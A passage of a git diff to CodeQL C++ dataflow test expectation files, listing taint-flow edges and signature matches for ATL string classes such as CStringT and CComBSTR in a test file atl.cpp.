| s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1180:10:1180:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1181:10:1181:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1182:10:1182:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1195:5:1195:6 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1198:10:1198:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1199:10:1199:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1202:10:1202:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1204:10:1204:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1205:10:1205:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1206:10:1206:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1102:23:1102:24 | call to CStringT | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1105:23:1105:33 | call to CStringT | atl.cpp:1106:10:1106:11 | s2 | | +| atl.cpp:1105:23:1105:33 | call to CStringT | atl.cpp:1108:23:1108:24 | s2 | | +| atl.cpp:1105:23:1105:33 | call to CStringT | atl.cpp:1192:10:1192:11 | s2 | | +| atl.cpp:1105:23:1105:33 | call to CStringT | atl.cpp:1213:3:1213:3 | s2 | | +| atl.cpp:1108:23:1108:24 | s2 | atl.cpp:1108:23:1108:25 | call to CStringT | | +| atl.cpp:1108:23:1108:25 | call to CStringT | atl.cpp:1109:10:1109:11 | s3 | | +| atl.cpp:1108:23:1108:25 | call to CStringT | atl.cpp:1213:3:1213:3 | s3 | | +| atl.cpp:1111:15:1111:35 | call to indirect_source | atl.cpp:1112:23:1112:23 | x | | +| atl.cpp:1111:15:1111:35 | call to indirect_source | atl.cpp:1119:23:1119:23 | x | | +| atl.cpp:1111:15:1111:35 | call to indirect_source | atl.cpp:1166:19:1166:19 | x | | +| atl.cpp:1111:15:1111:35 | call to indirect_source | atl.cpp:1185:24:1185:24 | x | | +| atl.cpp:1112:23:1112:23 | ref arg x | atl.cpp:1119:23:1119:23 | x | | +| atl.cpp:1112:23:1112:23 | ref arg x | atl.cpp:1166:19:1166:19 | x | | +| atl.cpp:1112:23:1112:23 | ref arg x | atl.cpp:1185:24:1185:24 | x | | +| atl.cpp:1112:23:1112:23 | x | atl.cpp:1112:23:1112:24 | call to CStringT | TAINT | +| atl.cpp:1112:23:1112:24 | call to CStringT | atl.cpp:1113:10:1113:11 | s4 | | +| atl.cpp:1112:23:1112:24 | call to CStringT | atl.cpp:1213:3:1213:3 | s4 | | +| atl.cpp:1115:18:1115:41 | call to indirect_source | atl.cpp:1116:26:1116:26 | y | | +| atl.cpp:1115:18:1115:41 | call to indirect_source | atl.cpp:1122:26:1122:26 | y | | +| atl.cpp:1116:26:1116:26 | ref arg y | atl.cpp:1122:26:1122:26 | y | | +| atl.cpp:1116:26:1116:26 | y | atl.cpp:1116:26:1116:27 | call to CStringT | TAINT | +| atl.cpp:1116:26:1116:27 | call to CStringT | atl.cpp:1117:10:1117:11 | s5 | | +| atl.cpp:1116:26:1116:27 | call to CStringT | atl.cpp:1213:3:1213:3 | s5 | | +| atl.cpp:1119:23:1119:33 | call to CStringT | atl.cpp:1120:10:1120:11 | s6 | | +| atl.cpp:1119:23:1119:33 | call to CStringT | atl.cpp:1213:3:1213:3 | s6 | | +| atl.cpp:1122:26:1122:36 | call to CStringT | atl.cpp:1123:10:1123:11 | s7 | | +| atl.cpp:1122:26:1122:36 | call to CStringT | atl.cpp:1213:3:1213:3 | s7 | | +| atl.cpp:1125:26:1125:55 | call to indirect_source | atl.cpp:1126:23:1126:25 | ucs | | +| atl.cpp:1126:23:1126:25 | ucs | atl.cpp:1126:23:1126:26 | call to CStringT | TAINT | +| atl.cpp:1126:23:1126:26 | call to CStringT | atl.cpp:1127:10:1127:11 | s8 | | +| atl.cpp:1126:23:1126:26 | call to CStringT | atl.cpp:1213:3:1213:3 | s8 | | +| atl.cpp:1129:14:1129:25 | call to source | atl.cpp:1130:23:1130:23 | c | | +| atl.cpp:1130:23:1130:23 | c | atl.cpp:1130:23:1130:24 | call to CStringT | TAINT | +| atl.cpp:1130:23:1130:24 | call to CStringT | atl.cpp:1131:10:1131:11 | s9 | | +| atl.cpp:1130:23:1130:24 | call to CStringT | atl.cpp:1213:3:1213:3 | s9 | | +| atl.cpp:1133:18:1133:32 | call to source | atl.cpp:1134:27:1134:28 | wc | | +| atl.cpp:1134:27:1134:28 | wc | atl.cpp:1134:27:1134:29 | call to CStringT | TAINT | +| atl.cpp:1134:27:1134:29 | call to CStringT | atl.cpp:1135:10:1135:12 | s10 | | +| atl.cpp:1134:27:1134:29 | call to CStringT | atl.cpp:1213:3:1213:3 | s10 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1173:10:1173:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1179:10:1179:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1180:10:1180:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1181:10:1181:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1182:10:1182:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1195:5:1195:6 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1198:10:1198:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1199:10:1199:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1202:10:1202:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1204:10:1204:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1205:10:1205:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1206:10:1206:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1139:17:1139:18 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1139:20:1139:33 | call to AllocSysString | atl.cpp:1140:10:1140:13 | bstr | | +| atl.cpp:1142:20:1142:22 | call to CStringT | atl.cpp:1143:5:1143:7 | s11 | | +| atl.cpp:1142:20:1142:22 | call to CStringT | atl.cpp:1144:10:1144:12 | s11 | | +| atl.cpp:1142:20:1142:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s11 | | +| atl.cpp:1143:5:1143:7 | ref arg s11 | atl.cpp:1144:10:1144:12 | s11 | | +| atl.cpp:1143:5:1143:7 | ref arg s11 | atl.cpp:1213:3:1213:3 | s11 | | +| atl.cpp:1146:20:1146:22 | call to CStringT | atl.cpp:1147:5:1147:7 | s12 | | +| atl.cpp:1146:20:1146:22 | call to CStringT | atl.cpp:1148:10:1148:12 | s12 | | +| atl.cpp:1146:20:1146:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s12 | | +| atl.cpp:1147:5:1147:7 | ref arg s12 | atl.cpp:1148:10:1148:12 | s12 | | +| atl.cpp:1147:5:1147:7 | ref arg s12 | atl.cpp:1213:3:1213:3 | s12 | | +| atl.cpp:1150:20:1150:22 | call to CStringT | atl.cpp:1151:5:1151:7 | s13 | | +| atl.cpp:1150:20:1150:22 | call to CStringT | atl.cpp:1152:10:1152:12 | s13 | | +| atl.cpp:1150:20:1150:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s13 | | +| atl.cpp:1151:5:1151:7 | ref arg s13 | atl.cpp:1152:10:1152:12 | s13 | | +| atl.cpp:1151:5:1151:7 | ref arg s13 | atl.cpp:1213:3:1213:3 | s13 | | +| atl.cpp:1154:20:1154:22 | call to CStringT | atl.cpp:1155:5:1155:7 | s14 | | +| atl.cpp:1154:20:1154:22 | call to CStringT | atl.cpp:1156:10:1156:12 | s14 | | +| atl.cpp:1154:20:1154:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s14 | | +| atl.cpp:1155:5:1155:7 | ref arg s14 | atl.cpp:1156:10:1156:12 | s14 | | +| atl.cpp:1155:5:1155:7 | ref arg s14 | atl.cpp:1213:3:1213:3 | s14 | | +| atl.cpp:1158:20:1158:22 | call to CStringT | atl.cpp:1159:5:1159:7 | s15 | | +| atl.cpp:1158:20:1158:22 | call to CStringT | atl.cpp:1160:10:1160:12 | s15 | | +| atl.cpp:1158:20:1158:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s15 | | +| atl.cpp:1159:5:1159:7 | ref arg s15 | atl.cpp:1160:10:1160:12 | s15 | | +| atl.cpp:1159:5:1159:7 | ref arg s15 | atl.cpp:1213:3:1213:3 | s15 | | +| atl.cpp:1162:20:1162:22 | call to CStringT | atl.cpp:1163:5:1163:7 | s16 | | +| atl.cpp:1162:20:1162:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s16 | | +| atl.cpp:1163:5:1163:7 | ref arg s16 | atl.cpp:1213:3:1213:3 | s16 | | +| atl.cpp:1165:20:1165:22 | call to CStringT | atl.cpp:1166:5:1166:7 | s17 | | +| atl.cpp:1165:20:1165:22 | call to CStringT | atl.cpp:1167:10:1167:12 | s17 | | +| atl.cpp:1165:20:1165:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s17 | | +| atl.cpp:1166:5:1166:7 | ref arg s17 | atl.cpp:1167:10:1167:12 | s17 | | +| atl.cpp:1166:5:1166:7 | ref arg s17 | atl.cpp:1213:3:1213:3 | s17 | | +| atl.cpp:1169:20:1169:22 | call to CStringT | atl.cpp:1170:5:1170:7 | s18 | | +| atl.cpp:1169:20:1169:22 | call to CStringT | atl.cpp:1171:10:1171:12 | s18 | | +| atl.cpp:1169:20:1169:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s18 | | +| atl.cpp:1170:5:1170:7 | ref arg s18 | atl.cpp:1171:10:1171:12 | s18 | | +| atl.cpp:1170:5:1170:7 | ref arg s18 | atl.cpp:1213:3:1213:3 | s18 | | +| atl.cpp:1175:20:1175:22 | call to CStringT | atl.cpp:1176:5:1176:7 | s20 | | +| atl.cpp:1175:20:1175:22 | call to CStringT | atl.cpp:1177:10:1177:12 | s20 | | +| atl.cpp:1175:20:1175:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s20 | | +| atl.cpp:1176:5:1176:7 | ref arg s20 | atl.cpp:1177:10:1177:12 | s20 | | +| atl.cpp:1176:5:1176:7 | ref arg s20 | atl.cpp:1213:3:1213:3 | s20 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1180:10:1180:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1181:10:1181:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1182:10:1182:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1195:5:1195:6 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1198:10:1198:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1199:10:1199:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1202:10:1202:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1204:10:1204:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1205:10:1205:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1206:10:1206:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1179:10:1179:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1181:10:1181:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1182:10:1182:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1195:5:1195:6 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1198:10:1198:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1199:10:1199:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1202:10:1202:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1204:10:1204:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1205:10:1205:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1206:10:1206:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1180:10:1180:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1182:10:1182:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1195:5:1195:6 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1198:10:1198:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1199:10:1199:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1202:10:1202:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1204:10:1204:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1205:10:1205:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1206:10:1206:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1181:10:1181:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1184:20:1184:22 | call to CStringT | atl.cpp:1185:5:1185:7 | s21 | | +| atl.cpp:1184:20:1184:22 | call to CStringT | atl.cpp:1186:10:1186:12 | s21 | | +| atl.cpp:1184:20:1184:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s21 | | +| atl.cpp:1185:5:1185:7 | ref arg s21 | atl.cpp:1186:10:1186:12 | s21 | | +| atl.cpp:1185:5:1185:7 | ref arg s21 | atl.cpp:1213:3:1213:3 | s21 | | +| atl.cpp:1188:20:1188:22 | call to CStringT | atl.cpp:1189:5:1189:7 | s22 | | +| atl.cpp:1188:20:1188:22 | call to CStringT | atl.cpp:1190:10:1190:12 | s22 | | +| atl.cpp:1188:20:1188:22 | call to CStringT | atl.cpp:1213:3:1213:3 | s22 | | +| atl.cpp:1189:5:1189:7 | ref arg s22 | atl.cpp:1190:10:1190:12 | s22 | | +| atl.cpp:1189:5:1189:7 | ref arg s22 | atl.cpp:1213:3:1213:3 | s22 | | +| atl.cpp:1194:10:1194:14 | bstr2 | atl.cpp:1195:22:1195:26 | bstr2 | | +| atl.cpp:1194:10:1194:14 | bstr2 | atl.cpp:1196:10:1196:14 | bstr2 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1198:10:1198:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1199:10:1199:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1202:10:1202:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1204:10:1204:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1205:10:1205:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1206:10:1206:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1195:5:1195:6 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1195:21:1195:26 | ref arg & ... | atl.cpp:1195:22:1195:26 | bstr2 [inner post update] | | +| atl.cpp:1195:21:1195:26 | ref arg & ... | atl.cpp:1196:10:1196:14 | bstr2 | | +| atl.cpp:1195:22:1195:26 | bstr2 | atl.cpp:1195:21:1195:26 | & ... | | +| atl.cpp:1201:16:1201:17 | 0 | atl.cpp:1202:29:1202:33 | start | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1205:10:1205:11 | s1 | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1206:10:1206:11 | s1 | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1204:10:1204:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1205:10:1205:11 | ref arg s1 | atl.cpp:1206:10:1206:11 | s1 | | +| atl.cpp:1205:10:1205:11 | ref arg s1 | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1205:10:1205:11 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1205:10:1205:11 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1205:10:1205:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1205:10:1205:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1205:10:1205:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1205:10:1205:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1206:10:1206:11 | ref arg s1 | atl.cpp:1207:10:1207:11 | s1 | | +| atl.cpp:1206:10:1206:11 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1206:10:1206:11 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1206:10:1206:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1206:10:1206:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1206:10:1206:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1206:10:1206:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1207:10:1207:11 | ref arg s1 | atl.cpp:1208:10:1208:11 | s1 | | +| atl.cpp:1207:10:1207:11 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1207:10:1207:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1207:10:1207:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1207:10:1207:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1207:10:1207:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1208:10:1208:11 | ref arg s1 | atl.cpp:1209:10:1209:11 | s1 | | +| atl.cpp:1208:10:1208:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1208:10:1208:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1208:10:1208:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1208:10:1208:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1209:10:1209:11 | ref arg s1 | atl.cpp:1210:10:1210:11 | s1 | | +| atl.cpp:1209:10:1209:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1209:10:1209:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1209:10:1209:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1210:10:1210:11 | ref arg s1 | atl.cpp:1211:10:1211:11 | s1 | | +| atl.cpp:1210:10:1210:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1210:10:1210:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1211:10:1211:11 | ref arg s1 | atl.cpp:1212:10:1212:11 | s1 | | +| atl.cpp:1211:10:1211:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1212:10:1212:11 | ref arg s1 | atl.cpp:1213:3:1213:3 | s1 | | +| atl.cpp:1220:21:1220:39 | call to source | atl.cpp:1221:10:1221:10 | d | | +| atl.cpp:1239:24:1239:45 | call to source | atl.cpp:1240:22:1240:22 | s | | +| atl.cpp:1239:24:1239:45 | call to source | atl.cpp:1243:3:1243:3 | s | | +| atl.cpp:1240:22:1240:22 | ref arg s | atl.cpp:1243:3:1243:3 | s | | +| atl.cpp:1240:22:1240:30 | call to CStrBufT | atl.cpp:1241:46:1241:46 | b | | +| atl.cpp:1240:22:1240:30 | call to CStrBufT | atl.cpp:1242:45:1242:45 | b | | +| atl.cpp:1241:46:1241:46 | ref arg b | atl.cpp:1242:45:1242:45 | b | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected index 6996b3d1c66c..b22b4cb59db0 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/test_mad-signatures.expected @@ -1,273 +1,273 @@ signatureMatches -| atl.cpp:70:3:70:15 | _U_STRINGorID | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:70:3:70:15 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:71:3:71:15 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:258:3:258:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:258:3:258:10 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:258:3:258:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:258:3:258:10 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:408:8:408:8 | operator= | (const CComBSTR &) | CComBSTR | Append | 0 | -| atl.cpp:408:8:408:8 | operator= | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | -| atl.cpp:410:3:410:10 | CComBSTR | (const CComBSTR &) | CComBSTR | Append | 0 | -| atl.cpp:410:3:410:10 | CComBSTR | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | -| atl.cpp:412:3:412:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:412:3:412:10 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | -| atl.cpp:413:3:413:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:413:3:413:10 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 1 | -| atl.cpp:414:3:414:10 | CComBSTR | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:414:3:414:10 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:415:3:415:10 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | -| atl.cpp:415:3:415:10 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:416:3:416:10 | CComBSTR | (CComBSTR &&) | CComBSTR | CComBSTR | 0 | -| atl.cpp:419:11:419:16 | Append | (const CComBSTR &) | CComBSTR | Append | 0 | -| atl.cpp:419:11:419:16 | Append | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | -| atl.cpp:420:11:420:16 | Append | (wchar_t) | | operator+= | 0 | -| atl.cpp:420:11:420:16 | Append | (wchar_t) | CComBSTR | Append | 0 | -| atl.cpp:420:11:420:16 | Append | (wchar_t) | CSimpleStringT | operator+= | 0 | -| atl.cpp:421:11:421:16 | Append | (char) | | operator+= | 0 | -| atl.cpp:421:11:421:16 | Append | (char) | CComBSTR | Append | 0 | -| atl.cpp:421:11:421:16 | Append | (char) | CSimpleStringT | operator+= | 0 | -| atl.cpp:422:11:422:16 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:422:11:422:16 | Append | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:423:11:423:16 | Append | (LPCSTR) | CComBSTR | Append | 0 | -| atl.cpp:423:11:423:16 | Append | (LPCSTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:424:11:424:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 0 | -| atl.cpp:424:11:424:16 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:424:11:424:16 | Append | (char,int) | CStringT | CStringT | 1 | -| atl.cpp:424:11:424:16 | Append | (const XCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:424:11:424:16 | Append | (const YCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:424:11:424:16 | Append | (wchar_t,int) | CStringT | CStringT | 1 | -| atl.cpp:425:11:425:20 | AppendBSTR | (wchar_t *) | CStringT | CStringT | 0 | -| atl.cpp:426:11:426:21 | AppendBytes | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:426:11:426:21 | AppendBytes | (char,int) | CStringT | CStringT | 1 | -| atl.cpp:426:11:426:21 | AppendBytes | (const XCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:426:11:426:21 | AppendBytes | (const YCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:426:11:426:21 | AppendBytes | 